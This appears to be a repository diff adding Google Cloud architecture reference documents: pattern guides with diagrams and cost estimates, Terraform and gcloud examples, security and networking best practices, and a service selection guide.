"application_type": "saas_platform",
"expected_users": 10000,
"requests_per_second": 100,
"budget_monthly_usd": 500,
"team_size": 3,
"gcp_experience": "intermediate",
"compliance": ["SOC2"],
"availability_sla": "99.9%"
}
```
---
## Output Formats
### Architecture Design
- Pattern recommendation with rationale
- Service stack diagram (ASCII)
- Monthly cost estimate and trade-offs
### IaC Templates
- **Terraform HCL**: Production-ready Google provider configs
- **gcloud CLI**: Scripted deployment commands
- **Cloud Build YAML**: CI/CD pipeline definitions
### Cost Analysis
- Current spend breakdown with optimization recommendations
- Priority action list (high/medium/low) and implementation checklist
---
## Anti-Patterns
| Anti-Pattern | Why It Fails | Better Approach |
|---|---|---|
| Using default VPC for production | No isolation, shared firewall rules | Create custom VPC with private subnets |
| Over-provisioning GKE node pools | Wasted cost on idle capacity | Use GKE Autopilot or cluster autoscaler |
| Storing secrets in environment variables | Visible in Cloud Console, logs | Use Secret Manager with Workload Identity |
| Ignoring sustained use discounts | Missing 20-30% automatic savings | Right-size VMs for consistent baseline usage |
| Single-region deployment for SaaS | One region outage = full downtime | Multi-region with Cloud Load Balancing |
| BigQuery on-demand for heavy workloads | Unpredictable costs at scale | Use BigQuery editions (capacity-based slot commitments) for consistent workloads |
| Running Cloud Functions for long tasks | 9-minute timeout, cold starts | Use Cloud Run for tasks > 60 seconds |
---
## Cross-References
| Skill | Relationship |
|-------|-------------|
| `engineering-team/aws-solution-architect` | AWS equivalent — same 6-step workflow, different services |
| `engineering-team/azure-cloud-architect` | Azure equivalent — completes the cloud trifecta |
| `engineering-team/senior-devops` | Broader DevOps scope — pipelines, monitoring, containerization |
| `engineering/terraform-patterns` | IaC implementation — use for Terraform modules targeting GCP |
| `engineering/ci-cd-pipeline-builder` | Pipeline construction — automates Cloud Build and deployment |
---
## Reference Documentation
| Document | Contents |
|----------|----------|
| `references/architecture_patterns.md` | 6 patterns: serverless, GKE microservices, three-tier, data pipeline, ML platform, multi-region |
| `references/service_selection.md` | Decision matrices for compute, database, storage, messaging |
| `references/best_practices.md` | Naming, labels, IAM, networking, monitoring, disaster recovery |

View File

@@ -0,0 +1,512 @@
# GCP Architecture Patterns
Reference guide for selecting the right GCP architecture pattern based on application requirements.
---
## Table of Contents
- [Pattern Selection Matrix](#pattern-selection-matrix)
- [Pattern 1: Serverless Web Application](#pattern-1-serverless-web-application)
- [Pattern 2: Microservices on GKE](#pattern-2-microservices-on-gke)
- [Pattern 3: Three-Tier Application](#pattern-3-three-tier-application)
- [Pattern 4: Serverless Data Pipeline](#pattern-4-serverless-data-pipeline)
- [Pattern 5: ML Platform](#pattern-5-ml-platform)
- [Pattern 6: Multi-Region High Availability](#pattern-6-multi-region-high-availability)
---
## Pattern Selection Matrix
| Pattern | Best For | Users | Monthly Cost | Complexity |
|---------|----------|-------|--------------|------------|
| Serverless Web | MVP, SaaS, mobile backend | <50K | $30-400 | Low |
| Microservices on GKE | Complex services, enterprise | 10K-500K | $400-2500 | Medium |
| Three-Tier | Traditional web, e-commerce | 10K-200K | $300-1500 | Medium |
| Data Pipeline | Analytics, ETL, streaming | Any | $100-2000 | Medium-High |
| ML Platform | Training, serving, MLOps | Any | $200-5000 | High |
| Multi-Region HA | Global apps, DR | >100K | 2x single | High |
---
## Pattern 1: Serverless Web Application
### Use Case
SaaS platforms, mobile backends, low-traffic websites, MVPs
### Architecture Diagram
```
┌─────────────┐ ┌─────────────┐ ┌─────────────┐
│ Cloud CDN │────▶│ Cloud │ │ Identity │
│ (CDN) │ │ Storage │ │ Platform │
└─────────────┘ │ (Static) │ │ (Auth) │
└─────────────┘ └──────┬──────┘
┌─────────────┐ ┌─────────────┐ ┌──────▼──────┐
│ Cloud DNS │────▶│ Cloud │────▶│ Cloud Run │
│ (DNS) │ │ Load Bal. │ │ (API) │
└─────────────┘ └─────────────┘ └──────┬──────┘
┌──────▼──────┐
│ Firestore │
│ (Database) │
└─────────────┘
```
### Service Stack
| Layer | Service | Configuration |
|-------|---------|---------------|
| Frontend | Cloud Storage + Cloud CDN | Static hosting with HTTPS |
| API | Cloud Run | Containerized API with auto-scaling |
| Database | Firestore | Native mode, pay-per-operation |
| Auth | Identity Platform | Multi-provider authentication |
| CI/CD | Cloud Build | Automated container deployments |
### Terraform Example
```hcl
resource "google_cloud_run_v2_service" "api" {
name = "my-app-api"
location = "us-central1"
template {
containers {
image = "gcr.io/my-project/my-app:latest"
resources {
limits = {
cpu = "1000m"
memory = "512Mi"
}
}
}
scaling {
min_instance_count = 0
max_instance_count = 10
}
}
}
```
### Cost Breakdown (10K users)
| Service | Monthly Cost |
|---------|-------------|
| Cloud Run | $5-25 |
| Firestore | $5-30 |
| Cloud CDN | $5-15 |
| Cloud Storage | $1-5 |
| Identity Platform | $0-10 |
| **Total** | **$16-85** |
### Pros and Cons
**Pros:**
- Scale-to-zero (pay nothing when idle)
- Container-based (no runtime restrictions)
- Built-in HTTPS and custom domains
- Auto-scaling with no configuration
**Cons:**
- Cold starts if min instances = 0
- Firestore query limitations vs SQL
- Vendor lock-in to GCP
---
## Pattern 2: Microservices on GKE
### Use Case
Complex business systems, enterprise applications, platform engineering
### Architecture Diagram
```
┌─────────────┐ ┌─────────────┐
│ Cloud CDN │────▶│ Global │
│ (CDN) │ │ Load Bal. │
└─────────────┘ └──────┬──────┘
┌──────▼──────┐
│ GKE │
│ Autopilot │
└──────┬──────┘
┌──────────────────┼──────────────────┐
│ │ │
┌──────▼──────┐ ┌──────▼──────┐ ┌──────▼──────┐
│ Cloud SQL │ │ Memorystore │ │ Pub/Sub │
│ (Postgres) │ │ (Redis) │ │ (Messaging) │
└─────────────┘ └─────────────┘ └─────────────┘
```
### Service Stack
| Layer | Service | Configuration |
|-------|---------|---------------|
| CDN | Cloud CDN | Edge caching, HTTPS |
| Load Balancer | Global Application LB | Backend services, health checks |
| Compute | GKE Autopilot | Managed node provisioning |
| Database | Cloud SQL PostgreSQL | Regional HA, read replicas |
| Cache | Memorystore Redis | Session, query caching |
| Messaging | Pub/Sub | Async service communication |
### GKE Autopilot Configuration
```yaml
# Deployment manifest
apiVersion: apps/v1
kind: Deployment
metadata:
name: api-service
spec:
replicas: 2
selector:
matchLabels:
app: api-service
template:
metadata:
labels:
app: api-service
spec:
serviceAccountName: api-workload-sa
containers:
- name: api
image: us-central1-docker.pkg.dev/my-project/my-app/api:latest
ports:
- containerPort: 8080
resources:
requests:
cpu: "500m"
memory: "512Mi"
limits:
cpu: "1000m"
memory: "1Gi"
env:
- name: DB_HOST
valueFrom:
secretKeyRef:
name: db-credentials
key: host
readinessProbe:
httpGet:
path: /health
port: 8080
initialDelaySeconds: 5
periodSeconds: 10
---
apiVersion: autoscaling/v2
kind: HorizontalPodAutoscaler
metadata:
name: api-service-hpa
spec:
scaleTargetRef:
apiVersion: apps/v1
kind: Deployment
name: api-service
minReplicas: 2
maxReplicas: 20
metrics:
- type: Resource
resource:
name: cpu
target:
type: Utilization
averageUtilization: 70
```
### Cost Breakdown (50K users)
| Service | Monthly Cost |
|---------|-------------|
| GKE Autopilot | $150-400 |
| Cloud Load Balancing | $25-50 |
| Cloud SQL | $100-300 |
| Memorystore | $40-80 |
| Pub/Sub | $5-20 |
| **Total** | **$320-850** |
---
## Pattern 3: Three-Tier Application
### Use Case
Traditional web apps, e-commerce, CMS, applications with complex queries
### Architecture Diagram
```
┌─────────────┐ ┌─────────────┐
│ Cloud CDN │────▶│ Global │
│ (CDN) │ │ Load Bal. │
└─────────────┘ └──────┬──────┘
┌──────▼──────┐
│ Cloud Run │
│ (or MIG) │
└──────┬──────┘
┌──────────────────┼──────────────────┐
│ │ │
┌──────▼──────┐ ┌──────▼──────┐ ┌──────▼──────┐
│ Cloud SQL │ │ Memorystore │ │ Cloud │
│ (Database) │ │ (Redis) │ │ Storage │
└─────────────┘ └─────────────┘ └─────────────┘
```
### Service Stack
| Layer | Service | Configuration |
|-------|---------|---------------|
| CDN | Cloud CDN | Edge caching, compression |
| Load Balancer | External Application LB | SSL termination, health checks |
| Compute | Cloud Run or Managed Instance Group | Auto-scaling containers or VMs |
| Database | Cloud SQL (MySQL/PostgreSQL) | Regional HA, automated backups |
| Cache | Memorystore Redis | Session store, query cache |
| Storage | Cloud Storage | Uploads, static assets, backups |
### Cost Breakdown (50K users)
| Service | Monthly Cost |
|---------|-------------|
| Cloud Run / MIG | $80-200 |
| Cloud Load Balancing | $25-50 |
| Cloud SQL | $100-250 |
| Memorystore | $30-60 |
| Cloud Storage | $10-30 |
| **Total** | **$245-590** |
---
## Pattern 4: Serverless Data Pipeline
### Use Case
Analytics, IoT data ingestion, log processing, real-time streaming, ETL
### Architecture Diagram
```
┌─────────────┐ ┌─────────────┐ ┌─────────────┐
│ Sources │────▶│ Pub/Sub │────▶│ Dataflow │
│ (Apps/IoT) │ │ (Ingest) │ │ (Process) │
└─────────────┘ └─────────────┘ └──────┬──────┘
┌─────────────┐ ┌─────────────┐ ┌──────▼──────┐
│ Looker │◀────│ BigQuery │◀────│ Cloud │
│ (Dashbd) │ │(Warehouse) │ │ Storage │
└─────────────┘ └─────────────┘ │ (Data Lake) │
└─────────────┘
```
### Service Stack
| Layer | Service | Purpose |
|-------|---------|---------|
| Ingestion | Pub/Sub | Real-time event capture |
| Processing | Dataflow (Apache Beam) | Stream/batch transforms |
| Warehouse | BigQuery | SQL analytics at scale |
| Storage | Cloud Storage | Raw data lake |
| Visualization | Looker / Looker Studio | Dashboards and reports |
| Orchestration | Cloud Composer (Airflow) | Pipeline scheduling |
### Dataflow Pipeline Example
```python
import apache_beam as beam
from apache_beam.options.pipeline_options import PipelineOptions
options = PipelineOptions([
'--runner=DataflowRunner',
'--project=my-project',
'--region=us-central1',
'--temp_location=gs://my-bucket/temp',
'--streaming'
])
with beam.Pipeline(options=options) as p:
(p
| 'ReadPubSub' >> beam.io.ReadFromPubSub(topic='projects/my-project/topics/events')
| 'ParseJSON' >> beam.Map(lambda x: json.loads(x))
| 'WindowInto' >> beam.WindowInto(beam.window.FixedWindows(60))
| 'WriteBQ' >> beam.io.WriteToBigQuery(
'my-project:analytics.events',
schema='event_id:STRING,event_type:STRING,timestamp:TIMESTAMP',
write_disposition=beam.io.BigQueryDisposition.WRITE_APPEND
))
```
### Cost Breakdown
| Service | Monthly Cost |
|---------|-------------|
| Pub/Sub | $5-30 |
| Dataflow | $30-200 |
| BigQuery (on-demand) | $10-100 |
| Cloud Storage | $5-30 |
| Looker Studio | $0 (free) |
| **Total** | **$50-360** |
---
## Pattern 5: ML Platform
### Use Case
Model training, serving, MLOps, feature engineering
### Architecture Diagram
```
┌─────────────┐ ┌─────────────┐ ┌─────────────┐
│ BigQuery │────▶│ Vertex AI │────▶│ Vertex AI │
│ (Features) │ │ (Training) │ │ (Endpoints) │
└─────────────┘ └──────┬──────┘ └─────────────┘
┌─────────────┐ ┌──────▼──────┐ ┌─────────────┐
│ Cloud │◀────│ Cloud │────▶│ Vertex AI │
│ Functions │ │ Storage │ │ Pipelines │
│ (Triggers) │ │ (Artifacts) │ │ (MLOps) │
└─────────────┘ └─────────────┘ └─────────────┘
```
### Service Stack
| Layer | Service | Purpose |
|-------|---------|---------|
| Data | BigQuery | Feature engineering, exploration |
| Training | Vertex AI Training | Custom or AutoML training |
| Serving | Vertex AI Endpoints | Online/batch prediction |
| Storage | Cloud Storage | Datasets, model artifacts |
| Orchestration | Vertex AI Pipelines | ML workflow automation |
| Monitoring | Vertex AI Model Monitoring | Drift and skew detection |
### Vertex AI Training Example
```python
from google.cloud import aiplatform
aiplatform.init(project='my-project', location='us-central1')
job = aiplatform.CustomTrainingJob(
display_name='my-model-training',
script_path='train.py',
container_uri='us-docker.pkg.dev/vertex-ai/training/tf-gpu.2-12:latest',
requirements=['pandas', 'scikit-learn'],
)
model = job.run(
replica_count=1,
machine_type='n1-standard-8',
accelerator_type='NVIDIA_TESLA_T4',
accelerator_count=1,
)
endpoint = model.deploy(
deployed_model_display_name='my-model-v1',
machine_type='n1-standard-4',
min_replica_count=1,
max_replica_count=5,
)
```
### Cost Breakdown
| Service | Monthly Cost |
|---------|-------------|
| Vertex AI Training (T4 GPU) | $50-500 |
| Vertex AI Prediction | $30-200 |
| BigQuery | $10-50 |
| Cloud Storage | $5-30 |
| **Total** | **$95-780** |
---
## Pattern 6: Multi-Region High Availability
### Use Case
Global applications, disaster recovery, data sovereignty compliance
### Architecture Diagram
```
┌─────────────┐
│ Cloud DNS │
│(Geo routing)│
└──────┬──────┘
┌────────────────┼────────────────┐
│ │
┌──────▼──────┐ ┌──────▼──────┐
│us-central1 │ │europe-west1 │
│ Cloud Run │ │ Cloud Run │
└──────┬──────┘ └──────┬──────┘
│ │
┌──────▼──────┐ ┌──────▼──────┐
│Cloud Spanner│◀── Replication ──▶│Cloud Spanner│
│ (Region) │ │ (Region) │
└─────────────┘ └─────────────┘
```
### Service Stack
| Component | Service | Configuration |
|-----------|---------|---------------|
| DNS | Cloud DNS | Geolocation or latency routing |
| CDN | Cloud CDN | Multiple regional origins |
| Compute | Cloud Run (multi-region) | Deployed in each region |
| Database | Cloud Spanner (multi-region) | Strong global consistency |
| Storage | Cloud Storage (multi-region) | Automatic geo-redundancy |
### Cloud DNS Geolocation Policy
```bash
# Create geolocation routing policy
gcloud dns record-sets create api.example.com \
--zone=my-zone \
--type=A \
--routing-policy-type=GEO \
--routing-policy-data="us-central1=projects/my-project/regions/us-central1/addresses/api-us;europe-west1=projects/my-project/regions/europe-west1/addresses/api-eu"
```
### Cost Considerations
| Factor | Impact |
|--------|--------|
| Compute | 2x (each region) |
| Cloud Spanner | Multi-region 3x regional price |
| Data Transfer | Cross-region replication costs |
| Cloud DNS | Geolocation queries premium |
| **Total** | **2-3x single region** |
---
## Pattern Comparison Summary
### Latency
| Pattern | Typical Latency |
|---------|-----------------|
| Serverless Web | 30-150ms (Cloud Run) |
| GKE Microservices | 15-80ms |
| Three-Tier | 20-100ms |
| Multi-Region | <50ms (regional) |
### Scaling Characteristics
| Pattern | Scale Limit | Scale Speed |
|---------|-------------|-------------|
| Serverless Web | 1000 instances/service | Seconds |
| GKE Microservices | Cluster node limits | Minutes |
| Data Pipeline | Unlimited (Dataflow) | Seconds |
| Multi-Region | Regional limits | Seconds |
### Operational Complexity
| Pattern | Setup | Maintenance | Debugging |
|---------|-------|-------------|-----------|
| Serverless Web | Low | Low | Medium |
| GKE Microservices | Medium | Medium | Medium |
| Three-Tier | Medium | Medium | Low |
| Data Pipeline | High | Medium | High |
| ML Platform | High | High | High |
| Multi-Region | High | High | High |

View File

@@ -0,0 +1,467 @@
# GCP Best Practices
Production-ready practices for naming, labels, IAM, networking, monitoring, and disaster recovery.
---
## Table of Contents
- [Naming Conventions](#naming-conventions)
- [Labels and Organization](#labels-and-organization)
- [IAM and Security](#iam-and-security)
- [Networking](#networking)
- [Monitoring and Logging](#monitoring-and-logging)
- [Cost Optimization](#cost-optimization)
- [Disaster Recovery](#disaster-recovery)
- [Common Pitfalls](#common-pitfalls)
---
## Naming Conventions
### Resource Naming Pattern
```
{environment}-{project}-{resource-type}-{purpose}
Examples:
prod-myapp-gke-cluster
dev-myapp-sql-primary
staging-myapp-run-api
prod-myapp-gcs-uploads
```
### Project Naming
```
{org}-{team}-{environment}
Examples:
acme-platform-prod
acme-platform-dev
acme-data-prod
```
### Naming Rules
| Resource | Format | Max Length | Example |
|----------|--------|-----------|---------|
| Project ID | lowercase, hyphens | 30 chars | acme-platform-prod |
| GKE Cluster | lowercase, hyphens | 40 chars | prod-api-cluster |
| Cloud Run | lowercase, hyphens | 49 chars | prod-myapp-api |
| Cloud SQL | lowercase, hyphens | 84 chars | prod-myapp-sql-primary |
| GCS Bucket | lowercase, hyphens, dots | 63 chars | acme-prod-myapp-uploads |
| Service Account | lowercase, hyphens | 30 chars | myapp-run-sa |
---
## Labels and Organization
### Required Labels
Apply these labels to all resources:
```
labels:
environment: "prod" # dev, staging, prod
team: "platform" # team owning the resource
app: "myapp" # application name
cost-center: "eng-001" # billing allocation
managed-by: "terraform" # terraform, gcloud, console
```
### Label-Based Cost Reporting
```bash
# Export billing data to BigQuery with labels
# Then query by label:
SELECT
labels.value AS environment,
SUM(cost) AS total_cost
FROM `billing_export.gcp_billing_export_v1_*`
CROSS JOIN UNNEST(labels) AS labels
WHERE labels.key = 'environment'
GROUP BY environment
ORDER BY total_cost DESC
```
### Organization Hierarchy
```
Organization
├── Folder: Production
│ ├── Project: platform-prod
│ ├── Project: data-prod
│ └── Project: ml-prod
├── Folder: Non-Production
│ ├── Project: platform-dev
│ ├── Project: platform-staging
│ └── Project: data-dev
└── Folder: Shared Services
├── Project: shared-networking
├── Project: shared-security
└── Project: shared-monitoring
```
---
## IAM and Security
### Principle of Least Privilege
```bash
# BAD: Basic roles are too broad
gcloud projects add-iam-policy-binding my-project \
--member="user:dev@example.com" \
--role="roles/editor"
# GOOD: Use predefined roles
gcloud projects add-iam-policy-binding my-project \
--member="user:dev@example.com" \
--role="roles/run.developer"
```
### Service Account Best Practices
```bash
# 1. Create dedicated SA per workload
gcloud iam service-accounts create myapp-api-sa \
--display-name="MyApp API Service Account"
# 2. Grant only required roles
gcloud projects add-iam-policy-binding my-project \
--member="serviceAccount:myapp-api-sa@my-project.iam.gserviceaccount.com" \
--role="roles/datastore.user"
# 3. Use Workload Identity for GKE (no key files)
gcloud iam service-accounts add-iam-policy-binding \
myapp-api-sa@my-project.iam.gserviceaccount.com \
--role="roles/iam.workloadIdentityUser" \
--member="serviceAccount:my-project.svc.id.goog[default/myapp-api-ksa]"
# 4. NEVER download SA key files in production
# Instead, use attached service accounts or impersonation
```
### VPC Service Controls
```bash
# Create a service perimeter to restrict data exfiltration
gcloud access-context-manager perimeters create my-perimeter \
--title="Production Data Perimeter" \
--resources="projects/123456" \
--restricted-services="bigquery.googleapis.com,storage.googleapis.com" \
--policy=$POLICY_ID
```
### Organization Policies
```bash
# Restrict external IPs on VMs
gcloud resource-manager org-policies set-policy \
--project=my-project policy.yaml
# policy.yaml
constraint: compute.vmExternalIpAccess
listPolicy:
allValues: DENY
# Restrict public Cloud Storage
constraint: storage.publicAccessPrevention
booleanPolicy:
enforced: true
```
### Encryption
| Layer | Service | Default |
|-------|---------|---------|
| At rest | Google-managed keys | Always enabled |
| At rest | CMEK (Cloud KMS) | Optional, recommended |
| In transit | TLS 1.3 | Always enabled |
| Application | Cloud KMS | Encrypt sensitive fields |
```bash
# Create CMEK key for Cloud SQL
gcloud kms keys create myapp-sql-key \
--keyring=myapp-keyring \
--location=us-central1 \
--purpose=encryption
# Use CMEK with Cloud SQL
gcloud sql instances create myapp-db \
--disk-encryption-key=projects/my-project/locations/us-central1/keyRings/myapp-keyring/cryptoKeys/myapp-sql-key
```
---
## Networking
### VPC Design
```bash
# Create custom VPC (avoid default network)
gcloud compute networks create myapp-vpc \
--subnet-mode=custom
# Create subnets with secondary ranges for GKE
gcloud compute networks subnets create myapp-subnet \
--network=myapp-vpc \
--region=us-central1 \
--range=10.0.0.0/20 \
--secondary-range pods=10.4.0.0/14,services=10.8.0.0/20 \
--enable-private-google-access
```
### Shared VPC
Use Shared VPC for multi-project environments:
```
Host Project (shared-networking)
├── VPC: shared-vpc
│ ├── Subnet: prod-us-central1 → Service Project: platform-prod
│ ├── Subnet: prod-europe-west1 → Service Project: platform-prod
│ └── Subnet: dev-us-central1 → Service Project: platform-dev
```
### Firewall Rules
```bash
# Allow internal traffic
gcloud compute firewall-rules create allow-internal \
--network=myapp-vpc \
--allow=tcp,udp,icmp \
--source-ranges=10.0.0.0/8
# Allow health checks from Google load balancers
gcloud compute firewall-rules create allow-health-checks \
--network=myapp-vpc \
--allow=tcp:8080 \
--source-ranges=35.191.0.0/16,130.211.0.0/22 \
--target-tags=allow-health-check
# Deny all other ingress (implicit, but be explicit)
gcloud compute firewall-rules create deny-all-ingress \
--network=myapp-vpc \
--action=DENY \
--rules=all \
--direction=INGRESS \
--priority=65534
```
### Private Google Access
Always enable Private Google Access to reach GCP APIs without public IPs:
```bash
gcloud compute networks subnets update myapp-subnet \
--region=us-central1 \
--enable-private-google-access
```
---
## Monitoring and Logging
### Cloud Monitoring Setup
```bash
# Create uptime check
gcloud monitoring uptime create \
--display-name="API Health Check" \
--resource-type=cloud-run-revision \
--resource-labels="service_name=myapp-api,location=us-central1" \
--check-request-path="/health" \
--period=60s
# Create alerting policy
gcloud alpha monitoring policies create \
--display-name="High Error Rate" \
--condition-display-name="Cloud Run 5xx > 1%" \
--condition-filter='resource.type="cloud_run_revision" AND metric.type="run.googleapis.com/request_count" AND metric.labels.response_code_class="5xx"' \
--condition-threshold-value=1 \
--notification-channels="projects/my-project/notificationChannels/12345"
```
### Key Metrics to Monitor
| Service | Metric | Alert Threshold |
|---------|--------|-----------------|
| Cloud Run | request_latencies (p99) | >2s |
| Cloud Run | request_count (5xx) | >1% of total |
| Cloud SQL | cpu/utilization | >80% |
| Cloud SQL | disk/utilization | >85% |
| GKE | container/cpu/utilization | >80% |
| GKE | node/cpu/allocatable_utilization | >85% |
| Pub/Sub | subscription/oldest_unacked_message_age | >300s |
| BigQuery | query/execution_time | >60s |
### Log-Based Metrics
```bash
# Create a metric for application errors
gcloud logging metrics create app-errors \
--description="Application error count" \
--log-filter='resource.type="cloud_run_revision" AND severity>=ERROR'
# Create log sink to BigQuery for analysis
gcloud logging sinks create audit-logs-bq \
bigquery.googleapis.com/projects/my-project/datasets/audit_logs \
--log-filter='logName="projects/my-project/logs/cloudaudit.googleapis.com%2Factivity"'
```
### Log Exclusion (Cost Reduction)
```bash
# Exclude verbose debug logs to save on Cloud Logging costs
gcloud logging sinks update _Default \
--log-filter='NOT (severity="DEBUG" OR severity="DEFAULT")' \
--description="Exclude debug-level logs"
# Or create exclusion filters
gcloud logging exclusions create exclude-debug \
--log-filter='severity="DEBUG"' \
--description="Exclude debug logs to reduce costs"
```
---
## Cost Optimization
### Committed Use Discounts
| Term | Compute Discount | Memory Discount |
|------|-----------------|-----------------|
| 1 year | 37% | 37% |
| 3 years | 55% | 55% |
```bash
# Check recommendations
gcloud recommender recommendations list \
--project=my-project \
--location=us-central1 \
--recommender=google.compute.commitment.UsageCommitmentRecommender
```
### Sustained Use Discounts
Automatic discounts for resources running >25% of the month:
| Usage | Discount |
|-------|----------|
| 25-50% | 20% |
| 50-75% | 40% |
| 75-100% | 60% |
### BigQuery Cost Control
```sql
-- Use partitioning to limit data scanned
CREATE TABLE my_dataset.events
PARTITION BY DATE(timestamp)
CLUSTER BY event_type
AS SELECT * FROM raw_events;
-- Estimate query cost before running
-- Use --dry_run flag
bq query --dry_run --use_legacy_sql=false \
'SELECT * FROM my_dataset.events WHERE DATE(timestamp) = "2026-01-01"'
```
### Cloud Storage Optimization
```bash
# Enable Autoclass for automatic class management
gsutil mb -l us-central1 --autoclass gs://my-bucket/
# Set lifecycle policy
gsutil lifecycle set lifecycle.json gs://my-bucket/
```
---
## Disaster Recovery
### RPO/RTO Targets
| Tier | RPO | RTO | Strategy |
|------|-----|-----|----------|
| Tier 1 (Critical) | 0 | <1 hour | Multi-region active-active |
| Tier 2 (Important) | <1 hour | <4 hours | Regional HA + cross-region backup |
| Tier 3 (Standard) | <24 hours | <24 hours | Automated backups + restore |
### Backup Strategy
```bash
# Cloud SQL automated backups
gcloud sql instances patch myapp-db \
--backup-start-time=02:00 \
--enable-point-in-time-recovery
# Firestore scheduled exports
gcloud firestore export gs://myapp-backups/firestore/$(date +%Y%m%d)
# GKE cluster backup with Backup for GKE
gcloud beta container backup-restore backup-plans create myapp-plan \
--project=my-project \
--location=us-central1 \
--cluster=projects/my-project/locations/us-central1/clusters/myapp-cluster \
--all-namespaces \
--cron-schedule="0 2 * * *"
```
### Multi-Region Failover
```bash
# Cloud SQL cross-region replica for DR
gcloud sql instances create myapp-db-replica \
--master-instance-name=myapp-db \
--region=us-east1
# Promote replica during failover
gcloud sql instances promote-replica myapp-db-replica
```
---
## Common Pitfalls
### Technical Debt
| Pitfall | Solution |
|---------|----------|
| Using default VPC | Always create custom VPCs |
| Not enabling audit logs | Enable Cloud Audit Logs from day one |
| Single-region deployment | Plan for multi-zone at minimum |
| No IaC | Use Terraform from the start |
### Security Mistakes
| Mistake | Prevention |
|---------|------------|
| SA key files in code | Use Workload Identity, attached SAs |
| Public GCS buckets | Enable org policy for public access prevention |
| Basic roles (Owner/Editor) | Use predefined or custom roles |
| No encryption key management | Use CMEK for sensitive data |
| Default service account | Create dedicated SAs per workload |
### Performance Issues
| Issue | Solution |
|-------|----------|
| Cold starts on Cloud Run | Set min-instances=1 for latency-critical services |
| Slow BigQuery queries | Partition tables, use clustering, avoid SELECT * |
| GKE pod scheduling delays | Use PodDisruptionBudget, pre-provision with Autopilot |
| Firestore hotspots | Distribute writes across document IDs evenly |
### Cost Surprises
| Surprise | Prevention |
|----------|------------|
| Undeleted resources | Label everything, review weekly |
| Egress costs | Keep traffic in same region, use Private Google Access |
| Cloud NAT charges | Use Private Google Access for GCP service traffic |
| Log ingestion costs | Set exclusion filters for debug/verbose logs |
| BigQuery full scans | Always use partitioning and clustering |
| Idle GKE clusters | Delete dev clusters nightly, use Autopilot |

View File

@@ -0,0 +1,547 @@
# GCP Service Selection Guide
Quick reference for choosing the right GCP service based on requirements.
---
## Table of Contents
- [Compute Services](#compute-services)
- [Database Services](#database-services)
- [Storage Services](#storage-services)
- [Messaging and Events](#messaging-and-events)
- [API and Integration](#api-and-integration)
- [Networking](#networking)
- [Security and Identity](#security-and-identity)
---
## Compute Services
### Decision Matrix
| Requirement | Recommended Service |
|-------------|---------------------|
| HTTP-triggered containers, auto-scaling | Cloud Run |
| Event-driven, short tasks (<9 min) | Cloud Functions (2nd gen) |
| Kubernetes workloads, microservices | GKE Autopilot |
| Custom VMs, GPU/TPU | Compute Engine |
| Batch processing, HPC | Batch |
| Kubernetes with full control | GKE Standard |
### Cloud Run
**Best for:** Containerized HTTP services, APIs, web backends
```
Limits:
- vCPU: 1-8 per instance
- Memory: 128 MiB - 32 GiB
- Request timeout: 3600 seconds
- Concurrency: 1-1000 per instance
- Min instances: 0 (scale-to-zero)
- Max instances: 1000
Pricing: Per vCPU-second + GiB-second (free tier: 2M requests/month)
```
**Use when:**
- Containerized apps with HTTP endpoints
- Variable/unpredictable traffic
- Want scale-to-zero capability
- No Kubernetes expertise needed
**Avoid when:**
- Non-HTTP workloads (use Cloud Functions or GKE)
- Need GPU/TPU (use Compute Engine or GKE)
- Require persistent local storage
### Cloud Functions (2nd gen)
**Best for:** Event-driven functions, lightweight triggers, webhooks
```
Limits:
- Execution: 60 minutes max for HTTP functions, 9 minutes for event-driven (2nd gen); 9 minutes (1st gen)
- Memory: 128 MB - 32 GB
- Concurrency: Up to 1000 per instance (2nd gen)
- Runtimes: Node.js, Python, Go, Java, .NET, Ruby, PHP
Pricing: $0.40 per million invocations + compute time
```
**Use when:**
- Event-driven processing (Pub/Sub, Cloud Storage, Firestore)
- Lightweight API endpoints
- Scheduled tasks (Cloud Scheduler triggers)
- Minimal infrastructure management
**Avoid when:**
- Long-running processes (>9 min)
- Complex multi-container apps
- Need fine-grained scaling control
### GKE Autopilot
**Best for:** Kubernetes workloads with managed node provisioning
```
Limits:
- Pod resources: 0.25-112 vCPU, 0.5-896 GiB memory
- GPU support: NVIDIA T4, L4, A100, H100
- Management fee: $0.10/hour per cluster ($74.40/month)
Pricing: Per pod vCPU-hour + GiB-hour (no node management)
```
**Use when:**
- Team has Kubernetes expertise
- Need pod-level resource control
- Multi-container services
- GPU workloads
### Compute Engine
**Best for:** Custom configurations, specialized hardware
```
Machine Types:
- General: e2, n2, n2d, c3
- Compute: c2, c2d
- Memory: m1, m2, m3
- Accelerator: a2 (GPU), a3 (GPU)
- Storage: z3
Pricing Options:
- On-demand, Spot (60-91% discount), Committed Use (37-55% discount)
```
**Use when:**
- Need GPU/TPU
- Windows workloads
- Specific hardware requirements
- Lift-and-shift migrations
---
## Database Services
### Decision Matrix
| Data Type | Query Pattern | Scale | Recommended |
|-----------|--------------|-------|-------------|
| Key-value, document | Simple lookups, real-time | Any | Firestore |
| Wide-column | High-throughput reads/writes | >1TB | Cloud Bigtable |
| Relational | Complex joins, ACID | Variable | Cloud SQL |
| Relational, global | Strong consistency, global | Large | Cloud Spanner |
| Time-series | Time-based queries | Any | Bigtable or BigQuery |
| Analytics, warehouse | SQL analytics | Petabytes | BigQuery |
### Firestore
**Best for:** Document data, mobile/web apps, real-time sync
```
Limits:
- Document size: 1 MiB max
- Field depth: 20 nested levels
- Write rate: 10,000 writes/sec per database
- Indexes: Automatic single-field, manual composite
Pricing:
- Reads: $0.036 per 100K reads
- Writes: $0.108 per 100K writes
- Storage: $0.108 per GiB/month
- Free tier: 50K reads, 20K writes, 1 GiB storage per day
```
**Use when:**
- Mobile/web apps needing offline sync
- Real-time data updates
- Flexible schema
- Serverless architecture
**Avoid when:**
- Complex SQL queries with joins
- Heavy analytics workloads
- Data >1 MiB per document
### Cloud SQL
**Best for:** Relational data with familiar SQL
| Engine | Version | Max Storage | Max Connections |
|--------|---------|-------------|-----------------|
| PostgreSQL | 15 | 64 TB | Instance-dependent |
| MySQL | 8.0 | 64 TB | Instance-dependent |
| SQL Server | 2022 | 64 TB | Instance-dependent |
```
Pricing:
- Machine type + storage + networking
- HA: 2x cost (regional instance)
- Read replicas: Per-replica pricing
```
**Use when:**
- Relational data with complex queries
- Existing SQL expertise
- Need ACID transactions
- Migration from on-premises databases
### Cloud Spanner
**Best for:** Globally distributed relational data
```
Limits:
- Storage: Unlimited
- Nodes: 1-100+ per instance
- Consistency: Strong global consistency
Pricing:
- Regional: $0.90/node-hour (~$657/month per node)
- Multi-region: $2.70/node-hour (~$1,971/month per node)
